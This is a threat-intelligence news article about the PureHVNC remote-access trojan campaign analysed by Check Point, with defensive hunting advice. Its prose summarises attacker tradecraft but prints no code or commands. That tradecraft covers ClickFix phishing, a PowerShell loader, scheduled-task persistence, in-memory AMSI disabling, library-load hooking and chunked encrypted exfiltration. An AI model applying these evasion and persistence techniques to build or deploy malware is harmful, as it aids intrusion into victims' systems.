PureHVNC Malware Exposed: Threat Actors Using GitHub for Distribution
Developers of the PureHVNC remote-access trojan have adopted a new level of concealment, brazenly using GitHub to host source code and modules for their malicious toolkit. That is the conclusion of Check Point Research after analysing an eight-day campaign that employed the social-engineering technique known as ClickFix.
The investigation revealed that PureHVNC’s command-and-control servers distributed links to GitHub repositories containing plugins and auxiliary components of the Pure family. Those repositories trace back to accounts associated with a developer alias, PureCoder. The analysis reconstructed not only the malware’s architecture but also its development practices and a geographic footprint of the author.
The campaign began with phishing emails directing victims to a counterfeit careers site, which served a PowerShell loader written in Rust that fetched PureHVNC payloads identified as “2a” and “amazon3.” Over eight days the operator executed multiple JavaScript-based scripts, installed PureHVNC twice, persisted it via scheduled tasks, and then deployed the Sliver framework for comprehensive network control.
The malware maintained persistent access over encrypted SSL channels, exfiltrating system telemetry—antivirus presence, privilege level, OS version and uptime—while compressing and chopping data into 16KB blocks to mask activity. Check Point recovered the full PureHVNC command set, configuration formats and plugin-loading mechanisms. Plugins are stored in compressed form within the registry and decompressed on demand at runtime.
A bundled PureCrypter builder lets customers choose encryption schemes, persistence techniques and injection methods; this modular design enables attackers to tailor payloads to specific objectives. Crucially, Check Point linked GitHub accounts such as testdemo345 and DFfe9ewf/PURE-CODER-1 to PureCoder, uncovering source for TwitchBot and YouTubeBot extensions used to inflate followers, likes and ad clicks. Commit metadata points to a UTC+03:00 timezone, suggesting origins in Eastern Europe or Western Asia.
The researchers also documented how PureHVNC evades Windows’ built-in protections—disabling AMSI in memory and intercepting library-loading functions to alter process behaviour. The final phase of infection executes decrypted shellcode from a dedicated memory region, a design that obscures presence and hampers analysis.
Paradoxically, hosting components on GitHub makes the adversary infrastructure more resilient and convenient to update, yet it leaves forensic traces: new repositories, commit patterns and module rollouts provide defenders with observable signals to track and disrupt development. Check Point also discovered a multilingual PureRAT admin panel—English, Russian and Chinese—indicating the operators’ international ambitions.
Given PureHVNC’s combination of public code hosting, encrypted command channels and built-in management tools, it constitutes a serious threat. Organisations should monitor network traffic for anomalous GitHub API calls and repository downloads from endpoints, flag scheduled tasks that reference external fetches, and investigate atypical SSL connections on nonstandard ports. Hunting should also include new versions of PureCrypter and PureLogs, which commonly accompany PureRAT campaigns.
Looking ahead, operators may migrate away from GitHub to alternative collaboration platforms or embed module retrieval directly into builders. Effective defence will require adaptable detection approaches that blend signature-based controls with behavioural analytics tuned to the adversary’s development patterns. Understanding those operational habits will give security teams the edge against this rapidly evolving family of threats.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
